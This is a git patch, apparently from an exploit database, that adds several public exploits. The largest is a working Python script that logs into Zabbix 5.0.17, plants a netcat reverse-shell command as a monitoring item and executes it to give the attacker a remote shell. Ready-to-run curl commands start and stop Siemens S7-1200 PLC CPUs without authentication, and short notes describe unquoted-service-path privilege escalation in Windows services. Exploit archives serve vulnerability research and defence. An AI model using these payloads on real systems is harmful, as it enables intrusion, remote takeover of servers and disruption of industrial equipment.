From 88a02fb8d81b3dd9e8ee11162832072f7e370596 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 11 Mar 2022 05:01:39 +0000 Subject: [PATCH] DB: 2022-03-11 8 changes to exploits/shellcodes Sony playmemories home - 'PMBDeviceInfoProvider' Unquoted Service Path McAfee(R) Safe Connect VPN - Unquoted Service Path Elevation Of Privilege BattlEye 0.9 - 'BEService' Unquoted Service Path WOW21 5.0.1.9 - 'Service WOW21_Service' Unquoted Service Path Sandboxie-Plus 5.50.2 - 'Service SbieSvc' Unquoted Service Path Siemens S7-1200 - Unauthenticated Start/Stop Command Zabbix 5.0.17 - Remote Code Execution (RCE) (Authenticated) --- exploits/hardware/remote/50793.txt | 1 - exploits/hardware/remote/50820.txt | 16 +++ exploits/php/webapps/50816.py | 151 +++++++++++++++++++++++++++++ exploits/windows/local/50814.txt | 29 ++++++ exploits/windows/local/50815.txt | 29 ++++++ exploits/windows/local/50817.txt | 31 ++++++ exploits/windows/local/50818.txt | 24 +++++ exploits/windows/local/50819.txt | 24 +++++ files_exploits.csv | 7 ++ 9 files changed, 311 insertions(+), 1 deletion(-) create mode 100644 exploits/hardware/remote/50820.txt create mode 100755 exploits/php/webapps/50816.py create mode 100644 exploits/windows/local/50814.txt create mode 100644 exploits/windows/local/50815.txt create mode 100644 exploits/windows/local/50817.txt create mode 100644 exploits/windows/local/50818.txt create mode 100644 exploits/windows/local/50819.txt diff --git a/exploits/hardware/remote/50793.txt b/exploits/hardware/remote/50793.txt index fb2a9119b..700ad8cf3 100644 --- a/exploits/hardware/remote/50793.txt +++ b/exploits/hardware/remote/50793.txt @@ -4,7 +4,6 @@ # Vendor Homepage: https://www.wago.com # Version: Firmware version 03.05.10(17) # Tested on: PopOS! [Linux](Firefox) -# CVE : CVE-2021-46388 ======================================== = The ordinary user privilege request: diff --git a/exploits/hardware/remote/50820.txt b/exploits/hardware/remote/50820.txt new file mode 100644 index 000000000..5f0eb5710 --- /dev/null +++ b/exploits/hardware/remote/50820.txt @@ -0,0 +1,16 @@ +# Exploit Title: Unauthenticated Siemens S7-1200 CPU Start/Stop Command +# Date: 09/03/2022 +# Exploit Author: RoseSecurity +# Vendor Homepage: https://www.siemens.com/global/en.html +# Version: V4.5 and below +# Tested on: Siemens S7-1200 (CPU: 1215C) + +# IP == PLC IP address + +# Start Command + +curl -i -s -k -X $'POST' \ -H $'Host: ' -H $'Content-Length: 19' -H $'Cache-Control:max-age=0' -H $'Upgrade-Insecure-Requests: 1' -H $'Origin: http://' -H $'Content-Type: application/x-www-form-urlencoded' -H $'User-Agent: Mozilla/5.0. (Windows NT 10.0; Win64; x64) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36' -H $'Accept: text/html, application /xhmtl+xml, application/xml; q=0.9,image/avif, image/webp, image/apng,*/ - *; q=0.8, application/signed-exchange; v=b3; q=0.9' -H $'Referer: http:///Portal/Portal.mwsl?PriNav=Start' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US, en; q=0.9' -H $'Connection: close' \ -b $'siemens_automation_no_intro=TRUE' \ --data-binary $'Run=1&PriNav=Start' \ 'http:///CPUCommands' + +# Stop Command + +curl -i -s -k -X $'POST' \ -H $'Host: ' -H $'Content-Length: 19' -H $'Cache-Control:max-age=0' -H $'Upgrade-Insecure-Requests: 1' -H $'Origin: http://' -H $'Content-Type: application/x-www-form-urlencoded' -H $'User-Agent: Mozilla/5.0. (Windows NT 10.0; Win64; x64) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36' -H $'Accept: text/html, application /xhmtl+xml, application/xml; q=0.9,image/avif, image/webp, image/apng,*/ - *; q=0.8, application/signed-exchange; v=b3; q=0.9' -H $'Referer: http:///Portal/Portal.mwsl?PriNav=Start' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US, en; q=0.9' -H $'Connection: close' \ -b $'siemens_automation_no_intro=TRUE' \ --data-binary $'Run=1&PriNav=Stop' \ 'http:///CPUCommands' \ No newline at end of file diff --git a/exploits/php/webapps/50816.py b/exploits/php/webapps/50816.py new file mode 100755 index 000000000..8dffb7169 --- /dev/null +++ b/exploits/php/webapps/50816.py @@ -0,0 +1,151 @@ +# Exploit Title: Zabbix 5.0.17 - Remote Code Execution (RCE) (Authenticated) +# Date: 9/3/2022 +# Exploit Author: Hussien Misbah +# Vendor Homepage: https://www.zabbix.com/ +# Software Link: https://www.zabbix.com/rn/rn5.0.17 +# Version: 5.0.17 +# Tested on: Linux +# Reference: https://github.com/HussienMisbah/tools/tree/master/Zabbix_exploit + +#!/usr/bin/python3 +# note : this is blind RCE so don't expect to see results on the site +# this exploit is tested against Zabbix 5.0.17 only + +import sys +import requests +import re +import random +import string +import colorama +from colorama import Fore + + +print(Fore.YELLOW+"[*] this exploit is tested against Zabbix 5.0.17 only") +print(Fore.YELLOW+"[*] can reach the author @ https://hussienmisbah.github.io/") + + +def item_name() : + letters = string.ascii_letters + item = ''.join(random.choice(letters) for i in range(20)) + return item + +if len(sys.argv) != 6 : + print(Fore.RED +"[!] usage : ./expoit.py ") + sys.exit(-1) + +url = sys.argv[1] +username =sys.argv[2] +password = sys.argv[3] +host = sys.argv[4] +port = sys.argv[5] + + +s = requests.Session() + + +headers ={ +"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", +} + +data = { +"request":"hosts.php", +"name" : username , +"password" : password , +"autologin" :"1" , +"enter":"Sign+in" +} + + +proxies = { + 'http': 'http://127.0.0.1:8080' +} + + +r = s.post(url+"/index.php",data=data) #proxies=proxies) + +if "Sign out" not in r.text : + print(Fore.RED +"[!] Authentication failed") + sys.exit(-1) +if "Zabbix 5.0.17" not in r.text : + print(Fore.RED +"[!] This is not Zabbix 5.0.17") + sys.exit(-1) + +if "filter_hostids%5B0%5D=" in r.text : + try : + x = re.search('filter_hostids%5B0%5D=(.*?)"', r.text) + hostId = x.group(1) + except : + print(Fore.RED +"[!] Exploit failed to resolve HostID") + print(Fore.BLUE +"[?] you can find it under /items then add item") + sys.exit(-1) +else : + print(Fore.RED +"[!] Exploit failed to resolve HostID") + print(Fore.BLUE +"[?] you can find HostID under /items then add item") + sys.exit(-1) + + +sid= re.search('',r.text).group(1) # hidden_csrf_token + + +command=f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {host} {port} >/tmp/f" + +payload = f"system.run[{command},nowait]" +Random_name = item_name() +data2 ={ + +"sid":sid,"form_refresh":"1","form":"create","hostid":hostId,"selectedInterfaceId":"0","name":Random_name,"type":"0","key":payload,"url":"","query_fields[name][1]":"","query_fields[value][1]":"","timeout":"3s","post_type":"0","posts":"","headers[name][1]":"","headers[value][1]":"","status_codes":"200","follow_redirects":"1","retrieve_mode":"0","http_proxy":"","http_username":"","http_password":"","ssl_cert_file":"","ssl_key_file":"","ssl_key_password":"","interfaceid":"1","params_es":"","params_ap":"","params_f":"","value_type":"3","units":"","delay":"1m","delay_flex[0][type]":"0","delay_flex[0][delay]":"","delay_flex[0][schedule]":"","delay_flex[0][period]":"","history_mode":"1","history":"90d","trends_mode":"1","trends":"365d","valuemapid":"0","new_application":"","applications[]":"0","inventory_link":"0","description":"","status":"0","add":"Add" +} + +r2 =s.post(url+"/items.php" ,data=data2,headers=headers,cookies={"tab":"0"} ) + + +no_pages= r2.text.count("?page=") + +#################################################[Searching in all pages for the uploaded item]################################################# +page = 1 +flag=False +while page <= no_pages : + r_page=s.get(url+f"/items.php?page={page}" ,headers=headers ) + if Random_name in r_page.text : + print(Fore.GREEN+"[+] the payload has been Uploaded Successfully") + x2 = re.search(rf"(\d+)[^\d]>{Random_name}",r_page.text) + try : + itemId=x2.group(1) + except : + pass + + print(Fore.GREEN+f"[+] you should find it at {url}/items.php?form=update&hostid={hostId}&itemid={itemId}") + flag=True + break + + else : + page +=1 + +if flag==False : + print(Fore.BLUE +"[?] do you know you can't upload same key twice ?") + print(Fore.BLUE +"[?] maybe it is already uploaded so set the listener and wait 1m") + print(Fore.BLUE +"[*] change the port and try again") + sys.exit(-1) + +#################################################[Executing the item]################################################# + + +data2["form"] ="update" +data2["selectedInterfaceId"] = "1" +data2["check_now"]="Execute+now" +data2.pop("add",None) +data2["itemid"]=itemId, + +print(Fore.GREEN+f"[+] set the listener at {port} please...") + +r2 =s.post(url+"/items.php" ,data=data2,headers=headers,cookies={"tab":"0"}) # ,proxies=proxies ) + +print(Fore.BLUE+ "[?] note : it takes up to +1 min so be patient :)") +answer =input(Fore.BLUE+"[+] got a shell ? [y]es/[N]o: ") + +if "y" in answer.lower() : + print(Fore.GREEN+"Nice !") +else : + print(Fore.RED+"[!] if you find out why please contact me ") + +sys.exit(0) \ No newline at end of file diff --git a/exploits/windows/local/50814.txt b/exploits/windows/local/50814.txt new file mode 100644 index 000000000..b58ba9c0f --- /dev/null +++ b/exploits/windows/local/50814.txt @@ -0,0 +1,29 @@ +# Exploit Title: McAfee® Safe Connect VPN - Unquoted Service Path Elevation Of Privilege +# Date: 09/03/2022 +# Exploit Author: Saud Alenazi +# Vendor Homepage: https://www.mcafee.com/ +# Software Link: https://www.mcafee.com/en-us/vpn/mcafee-safe-connect.html +# Version: 2.13 +# Tested: Windows 10 x64 +# Contact: https://twitter.com/dmaral3noz + +C:\Users\saudh>sc qc SafeConnectService + +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: SafeConnectService + + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files (x86)\McAfee\McAfee Safe Connect\SafeConnect.ServiceHost.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : McAfee Safe Connect Service + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + + +#Exploit: + +A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application. \ No newline at end of file diff --git a/exploits/windows/local/50815.txt b/exploits/windows/local/50815.txt new file mode 100644 index 000000000..856663bb5 --- /dev/null +++ b/exploits/windows/local/50815.txt @@ -0,0 +1,29 @@ +# Exploit Title: BattlEye 0.9 - 'BEService' Unquoted Service Path +# Date: 09/03/2022 +# Exploit Author: Saud Alenazi +# Vendor Homepage: https://www.battleye.com/ +# Software Link: https://www.battleye.com/downloads/ +# Version: 0.94 +# Tested: Windows 10 Pro +# Contact: https://twitter.com/dmaral3noz + + +C:\Users\saudh>sc qc BEService + +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: BEService + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 3 DEMAND_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files (x86)\Common Files\BattlEye\BEService.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : BattlEye Service + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + + +#Exploit: + +A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application. \ No newline at end of file diff --git a/exploits/windows/local/50817.txt b/exploits/windows/local/50817.txt new file mode 100644 index 000000000..42f4cbc49 --- /dev/null +++ b/exploits/windows/local/50817.txt @@ -0,0 +1,31 @@ +# Exploit Title: Sony playmemories home - 'PMBDeviceInfoProvider' Unquoted Service Path +# Date: 09/03/2022 +# Exploit Author: Saud Alenazi +# Vendor Homepage: https://www.sony.com/ +# Software Link: https://support.d-imaging.sony.co.jp/www/disoft/int/download/playmemories-home/win/en/index.html +# Version: 6.0 +# Tested: Windows 10 Pro +# Contact: https://twitter.com/dmaral3noz + + +C:\Users\saudh>sc qc PMBDeviceInfoProvider + +[SC] QueryServiceConfig SUCCESS + + +SERVICE_NAME: PMBDeviceInfoProvider + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files (x86)\Sony\PlayMemories Home\PMBDeviceInfoProvider.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : PMBDeviceInfoProvider + DEPENDENCIES : RPCSS + SERVICE_START_NAME : LocalSystem + + + +#Exploit: + +A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application. \ No newline at end of file diff --git a/exploits/windows/local/50818.txt b/exploits/windows/local/50818.txt new file mode 100644 index 000000000..25f8a8980 --- /dev/null +++ b/exploits/windows/local/50818.txt @@ -0,0 +1,24 @@ +# Exploit Title: WOW21 5.0.1.9 - 'Service WOW21_Service' Unquoted Service Path +# Exploit Author: Antonio Cuomo (arkantolo) +# Exploit Date: 2022-03-09 +# Vendor : ilwebmaster21 +# Version : WOW21_Service 5.0.1.9 +# Vendor Homepage : https://wow21.life/ +# Tested on OS: Windows 10 Pro x64 + +#PoC : +============== + +C:\>sc qc WOW21_Service +[SC] QueryServiceConfig OPERAZIONI RIUSCITE + +NOME_SERVIZIO: WOW21_Service + TIPO : 10 WIN32_OWN_PROCESS + TIPO_AVVIO : 2 AUTO_START + CONTROLLO_ERRORE : 1 NORMAL + NOME_PERCORSO_BINARIO : C:\Program Files\WOW21\WOW21_Service.exe + GRUPPO_ORDINE_CARICAMENTO : + TAG : 0 + NOME_VISUALIZZATO : WOW21_Service + DIPENDENZE : + SERVICE_START_NAME : LocalSystem \ No newline at end of file diff --git a/exploits/windows/local/50819.txt b/exploits/windows/local/50819.txt new file mode 100644 index 000000000..c08811bf4 --- /dev/null +++ b/exploits/windows/local/50819.txt @@ -0,0 +1,24 @@ +# Exploit Title: Sandboxie-Plus 5.50.2 - 'Service SbieSvc' Unquoted Service Path +# Exploit Author: Antonio Cuomo (arkantolo) +# Exploit Date: 2022-03-09 +# Vendor : David Xanatos +# Version : SbieSvc 5.50.2 +# Vendor Homepage : https://sandboxie-plus.com/ +# Tested on OS: Windows 10 Pro x64 + +#PoC : +============== + +C:\>sc qc SbieSvc +[SC] QueryServiceConfig OPERAZIONI RIUSCITE + +NOME_SERVIZIO: SbieSvc + TIPO : 10 WIN32_OWN_PROCESS + TIPO_AVVIO : 2 AUTO_START + CONTROLLO_ERRORE : 1 NORMAL + NOME_PERCORSO_BINARIO : C:\Program Files\Sandboxie-Plus\SbieSvc.exe + GRUPPO_ORDINE_CARICAMENTO : UIGroup + TAG : 0 + NOME_VISUALIZZATO : Sandboxie Service + DIPENDENZE : + SERVICE_START_NAME : LocalSystem \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 3d36e34b7..255d64cc3 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11457,6 +11457,7 @@ id,file,description,date,author,type,platform,port 50789,exploits/windows/local/50789.py,"Cobian Reflector 0.9.93 RC1 - 'Password' Denial of Service (PoC)",1970-01-01,"Luis Martínez",local,windows, 50790,exploits/windows/local/50790.py,"Cobian Backup 11 Gravity 11.2.0.582 - 'Password' Denial of Service (PoC)",1970-01-01,"Luis Martínez",local,windows, 50791,exploits/windows/local/50791.txt,"Cobian Backup Gravity 11.2.0.582 - 'CobianBackup11' Unquoted Service Path",1970-01-01,"Luis Martínez",local,windows, +50817,exploits/windows/local/50817.txt,"Sony playmemories home - 'PMBDeviceInfoProvider' Unquoted Service Path",1970-01-01,"Saud Alenazi",local,windows, 50804,exploits/windows/local/50804.txt,"Private Internet Access 3.3 - 'pia-service' Unquoted Service Path",1970-01-01,"Saud Alenazi",local,windows, 50805,exploits/windows/local/50805.txt,"Cloudflare WARP 1.4 - Unquoted Service Path",1970-01-01,"Hejap Zairy Al-Sharif",local,windows, 50806,exploits/windows/local/50806.txt,"Malwarebytes 4.5 - Unquoted Service Path",1970-01-01,"Hejap Zairy Al-Sharif",local,windows, @@ -11466,6 +11467,10 @@ id,file,description,date,author,type,platform,port 50811,exploits/windows/local/50811.py,"Audio Conversion Wizard v2.01 - Buffer Overflow",1970-01-01,"Hejap Zairy Al-Sharif",local,windows, 50812,exploits/windows/local/50812.cs,"Printix Client 1.3.1106.0 - Privilege Escalation",1970-01-01,"Logan Latvala",local,windows, 50813,exploits/windows/local/50813.txt,"Wondershare Dr.Fone 12.0.18 - 'Wondershare InstallAssist' Unquoted Service Path",1970-01-01,"Mohamed Alzhrani",local,windows, +50814,exploits/windows/local/50814.txt,"McAfee(R) Safe Connect VPN - Unquoted Service Path Elevation Of Privilege",1970-01-01,"Saud Alenazi",local,windows, +50815,exploits/windows/local/50815.txt,"BattlEye 0.9 - 'BEService' Unquoted Service Path",1970-01-01,"Saud Alenazi",local,windows, +50818,exploits/windows/local/50818.txt,"WOW21 5.0.1.9 - 'Service WOW21_Service' Unquoted Service Path",1970-01-01,"Antonio Cuomo",local,windows, +50819,exploits/windows/local/50819.txt,"Sandboxie-Plus 5.50.2 - 'Service SbieSvc' Unquoted Service Path",1970-01-01,"Antonio Cuomo",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139 @@ -18641,6 +18646,7 @@ id,file,description,date,author,type,platform,port 50793,exploits/hardware/remote/50793.txt,"WAGO 750-8212 PFC200 G2 2ETH RS - Privilege Escalation",1970-01-01,"Momen Eldawakhly",remote,hardware, 50796,exploits/windows/remote/50796.html,"Prowise Reflect v1.0.9 - Remote Keystroke Injection",1970-01-01,"Rik Lutz",remote,windows, 50798,exploits/windows/remote/50798.cs,"Printix Client 1.3.1106.0 - Remote Code Execution (RCE)",1970-01-01,"Logan Latvala",remote,windows, +50820,exploits/hardware/remote/50820.txt,"Siemens S7-1200 - Unauthenticated Start/Stop Command",1970-01-01,RoseSecurity,remote,hardware, 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php, @@ -44883,3 +44889,4 @@ id,file,description,date,author,type,platform,port 50802,exploits/php/webapps/50802.py,"Attendance and Payroll System v1.0 - SQLi Authentication Bypass",1970-01-01,pr0z,webapps,php, 50803,exploits/multiple/webapps/50803.py,"Hasura GraphQL 2.2.0 - Information Disclosure",1970-01-01,"Dolev Farhi",webapps,multiple, 50809,exploits/linux/webapps/50809.py,"Webmin 1.984 - Remote Code Execution (Authenticated)",1970-01-01,faisalfs10x,webapps,linux, +50816,exploits/php/webapps/50816.py,"Zabbix 5.0.17 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Hussien Misbah",webapps,php,